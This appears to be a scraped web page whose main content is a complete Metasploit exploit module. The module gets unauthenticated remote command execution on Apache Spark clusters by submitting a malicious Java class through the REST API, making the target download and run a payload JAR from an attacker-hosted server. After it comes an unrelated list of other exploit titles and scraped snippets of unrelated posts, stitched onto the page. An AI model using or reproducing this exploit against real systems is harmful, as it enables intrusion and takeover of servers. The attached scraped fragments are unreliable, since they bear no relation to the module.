##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})

    super(update_info(info,

      'Name'           => 'Apache Spark Unauthenticated Command Execution',

      'Description'    => %q{

          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.

          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.

      },

      'License'        => MSF_LICENSE,

      'Author'         =>

        [

          'aRe00t',                            # Proof of concept

          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module

        ],

      'References'     =>

        [

          ['URL', 'https://www.jianshu.com/p/a080cb323832'],

          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']

        ],

      'Platform'       => 'java',

      'Arch'           => [ARCH_JAVA],

      'Targets'        =>

        [

          ['Automatic', {}]

        ],

      'Privileged'     => false,

      'DisclosureDate' => 'Dec 12 2017',

      'DefaultTarget'  => 0,

      'Notes'          =>

        {

          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],

          'Stability'   => [ CRASH_SAFE ],

          'Reliability' => [ REPEATABLE_SESSION]

        }

    ))

    register_options [

      Opt::RPORT(6066),

      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])

    ]

  end

  def check

    return CheckCode::Detected if get_version

    CheckCode::Unknown

  end

  def primer

    path = service.resources.keys[0]

    binding_ip = srvhost_addr

    proto = datastore['SSL'] ? 'https' : 'http'

    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"

    send_payload(payload_uri)

  end

  def exploit

    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version

    vprint_status("Generating payload ...")

    @pl = generate_payload.encoded_jar(random:true)

    print_error("Failed to generate the payload.") unless @pl

    print_status("Starting up our web service ...")

    Timeout.timeout(datastore['HTTPDELAY']) { super }

  rescue Timeout::Error

  end

  def get_version

    @version = nil

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path),

      'method'        => 'GET'

    )

    unless res

      vprint_bad("#{peer} - No response. ")

      return false

    end

    if res.code == 401

      print_bad("#{peer} - Authentication required.")

      return false

    end

    unless res.code == 400

      return false

    end

    res_json = res.get_json_document

    @version = res_json['serverSparkVersion']

    if @version.nil?

      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")

      return false

    end

    true

  end

  def send_payload(payload_uri)

    rand_appname   = Rex::Text.rand_text_alpha_lower(8..16)

    data =

    {

      "action"                    => "CreateSubmissionRequest",

      "clientSparkVersion"        => @version.to_s,

      "appArgs"                   => [],

      "appResource"               => payload_uri.to_s,

      "environmentVariables"      => {"SPARK_ENV_LOADED" => ""},

      "mainClass"                 => "#{@pl.substitutions["metasploit"]}.Payload",

      "sparkProperties"           =>

      {

        "spark.jars"              => payload_uri.to_s,

        "spark.driver.supervise"  => "false",

        "spark.app.name"          => rand_appname.to_s,

        "spark.eventLog.enabled"  => "true",

        "spark.submit.deployMode" => "cluster",

        "spark.master"            => "spark://#{rhost}:#{rport}"

      }

    }

    res = send_request_cgi(

      'uri'           => normalize_uri(target_uri.path, "/v1/submissions/create"),

      'method'        => 'POST',

      'ctype'         => 'application/json;charset=UTF-8',

      'data'          => data.to_json

    )

  end

  # Handle incoming requests

  def on_request_uri(cli, request)

    print_status("#{rhost}:#{rport} - Sending the payload to the server...")

    send_response(cli, @pl)

  end

end

[EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)的更多相关文章

  1. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. [EXP]Huawei Router HG532e - Command Execution

    #!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2,req ...

  4. [EXP]Apache Tika-server < 1.18 - Command Injection

    #################################################################################################### ...

  5. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  7. Why Apache Spark is a Crossover Hit for Data Scientists [FWD]

    Spark is a compelling multi-purpose platform for use cases that span investigative, as well as opera ...

  8. Apache Spark源码走读之13 -- hiveql on spark实现详解

    欢迎转载,转载请注明出处,徽沪一郎 概要 在新近发布的spark 1.0中新加了sql的模块,更为引人注意的是对hive中的hiveql也提供了良好的支持,作为一个源码分析控,了解一下spark是如何 ...

  9. Apache Spark 2.2.0 中文文档

    Apache Spark 2.2.0 中文文档 - 快速入门 | ApacheCN Geekhoo 关注 2017.09.20 13:55* 字数 2062 阅读 13评论 0喜欢 1 快速入门 使用 ...

随机推荐

  1. poj3273(二分)

    题目链接:https://vjudge.net/problem/POJ-3273 题意:给定n个数,将这n个数划分成m块,问所有块最大值的最小是多少. 思路:注意到所求值最大为109,所以可以用二分来 ...

  2. 65. Valid Number 判断字符串是不是数字

    [抄题]: Validate if a given string is numeric. Some examples:"0" => true" 0.1 " ...

  3. [leetcode]716. Max Stack 最大栈

    Design a max stack that supports push, pop, top, peekMax and popMax. push(x) -- Push element x onto ...

  4. 获奖感想和Java学习总结

    获奖感想和Java学习总结 一.获奖感想 能成为小黄衫第二批的成员之一,我感到非常荣幸.我在对老师给予我的鼓励与肯定感到欣喜之余,更多的是感受到了一种鞭策与期望.小黄衫不仅仅是对我的一种奖励,更是激励 ...

  5. IOS Javascript Date的坑

    Date对象是JavaScript提供的日期和时间的操作接口,它有多种用法.手册上或者网上也有很多文章介绍,这里就不再次复述了. 上次遇到一个坑,这里总结下,也不是什么大问题,若是如果有经验,就不会花 ...

  6. Linux驱动之异常处理体系结构简析

    异常的概念在单片机中也接触过,它的意思是让CPU可以暂停当前的事情,跳到异常处理程序去执行.以前写单片机裸机程序属于前后台程序,前台指的就是mian函数里的while(1)大循环,后台指的就是产生异常 ...

  7. Java 7 使用TWR(Try-with-resources)完成文件copy

    try-with-resources语句是声明了一个或多个资源的try语句块.在java中资源作为一个对象,在程序完成后必须关闭.try-with-resources语句确保每个资源在语句结束时关闭. ...

  8. Linux配置ntp时间服务器(全)

    时间服务器作用: 大数据产生与处理系统是各种计算设备集群的,计算设备将统一.同步的标准时间用于记录各种事件发生时序, 如E-MAIL信息.文件创建和访问时间.数据库处理时间等. 大数据系统内不同计算设 ...

  9. 5阶m序列

    void echo32(int m) { printf("%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d\n ...

  10. Chapter3_操作符_直接常量和指数计数法

    (1)直接常量 在程序中使用直接常量,相当于指导编译器,告诉它要生成什么样的类型,这样就不会产生模棱两可的情况.比如flaot a = 1f等,后缀表示告诉编译器想生成的类型.常用的后缀有l/L(lo ...